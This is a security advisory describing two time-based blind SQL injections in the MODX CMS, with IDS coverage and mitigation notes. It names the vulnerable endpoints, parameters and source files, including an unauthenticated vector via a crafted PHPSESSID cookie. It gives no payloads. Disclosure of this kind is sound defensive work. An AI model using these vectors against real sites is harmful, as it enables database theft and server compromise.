There are two time-based blind SQL injections in the CMS Modx. The first is exploitable through the session ID supplied by the user; this issue can be exploited without authentication. The second SQL injection vector requires authentication and can be exploited through a request to ‘/connector/security/message.php’ in the user parameter. This issue allows an attacker to retrieve information from the database which could allow them to eventually compromise the server.
Exploitation
Stages
- Remote unauthenticated attacker sends a request to ‘/manager/index.php’ with a crafted PHPSESSID in the cookie header.
- The server sends the crafted PHPSESSID value to the MySQL database to be processed.
- The server returns the information the attacker requested, such as a password dump.
Prerequisites
None
Vulnerability Description
There are two time-based blind SQL injections in the CMS Modx. The first is exploitable through the session ID supplied by the user. This issue can be exploited without authentication and is caused by a lack of validation in the file ‘modsessionhandler.class.php’.
The second SQL injection vector requires authentication and can be exploited through a request to ‘/connector/security/message.php’ in the user parameter. This is caused by a lack of input validation in the file ‘core/model/modx/processors/security/message/create.php’. This issue allows an attacker to retrieve information from the database which could allow them to eventually compromise the server.
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to the exploit and has developed signatures for mitigating the threat depending on the security service in place.
The Network-Based Intrusion Detection System (IDS) has been updated with the new signatures for this exploit when detected via Alert Logic Threat Manager™. If this signature is detected, an incident is generated in the Alert Logic console.
Recommendations for Mitigation
- Update the plugin to a non- vulnerable version > 2.1.77.
- Check User permissions. Ensure only you and your trusted team members have administrator access to the site.
Comments
0 comments
Please sign in to leave a comment.